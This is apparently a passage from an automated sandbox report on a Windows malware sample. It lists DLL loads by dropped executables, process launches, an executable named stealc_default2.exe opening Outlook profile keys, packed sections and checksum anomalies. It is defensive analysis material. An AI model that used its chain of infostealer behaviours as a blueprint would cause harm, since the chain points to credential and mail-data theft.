Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1913856 > 1048576
Source: file.exe Static PE information: Raw size of mahfbdtk is bigger than: 0x100000 < 0x1a1600
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 6.2.file.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 10.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 13.2.axplong.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mahfbdtk:EW;akwexcdv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Unpacked PE file: 42.2.550b7cfe5f.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wrsfsivy:EW;bfxftgti:EW;.taggant:EW;
Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs .Net Code: WaitDelegatesetLatencyMode
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs .Net Code: WaitDelegatesetLatencyMode
Source: random[1].exe0.13.dr Static PE information: 0x9C4597AB [Wed Jan 29 23:35:07 2053 UTC]
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 17_2_00789860
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: shop[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: shop.exe.13.dr Static PE information: real checksum: 0x0 should be: 0xa36fe
Source: c8908bf20d.exe.13.dr Static PE information: real checksum: 0x2142c2 should be: 0x2115c3
Source: GOLD1234.exe.13.dr Static PE information: real checksum: 0x0 should be: 0xacdea
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr Static PE information: real checksum: 0x2a786b should be: 0x2a96e2
Source: random[1].exe0.13.dr Static PE information: real checksum: 0x0 should be: 0x86b26
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr Static PE information: real checksum: 0x1df3c9 should be: 0x1dd90c
Source: 550b7cfe5f.exe.13.dr Static PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
Source: axplong.exe.6.dr Static PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
Source: random[1].exe1.13.dr Static PE information: real checksum: 0x2ecf7f should be: 0x2e75f0
Source: f55899dae2.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x86b26
Source: random[2].exe.13.dr Static PE information: real checksum: 0x2142c2 should be: 0x2115c3
Source: random[1].exe.13.dr Static PE information: real checksum: 0x2bfef4 should be: 0x2c40af
Source: stealc_default2.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x516aa
Source: RDX123456[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x5876f
Source: GOLD1234[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0xacdea
Source: stealc_default2[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x516aa
Source: RDX123456.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x5876f
Source: Application.exe.33.dr Static PE information: real checksum: 0x0 should be: 0x86b26
Source: file.exe Static PE information: real checksum: 0x1d48a6 should be: 0x1dd6b2
